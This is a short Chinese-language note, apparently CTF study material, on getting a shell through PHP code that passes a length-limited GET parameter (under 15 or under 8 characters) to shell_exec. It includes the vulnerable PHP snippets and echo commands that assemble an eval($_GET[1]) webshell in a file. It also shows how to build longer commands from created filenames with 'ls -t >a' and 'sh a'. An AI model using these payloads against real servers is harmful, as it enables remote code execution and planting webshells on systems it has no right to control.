15位、7位可控字符下的任意命令执行 :

可控字符串长度受限情况下Getshell:

15个字符：
<?php
highlight_file(_FILE_);
if(strlen($_GET[1])<15){
  echo strlen($_GET[1]);
  echo shell_exec($_GET[1]);
}else{
  exit('too long');
}
?>
 

echo /<?php >1
echo eval\(>>1
echo \$_GET>>1
echo \[1\]>>1
echo \)\;>>1

7个字符
<?php

highlight_file(_FILE_);
if(strlen($_GET[1])<8){
  echo shell_exec($_GET[1]);
}
?>

命令>文件名
结果输出到文件

>。生成文件名
ls -t >a 文件名写入a
sh a 执行写入的啊

欠缺。顺序  ls -t
sh a

长命令\换行分隔

l\
s
pw\
d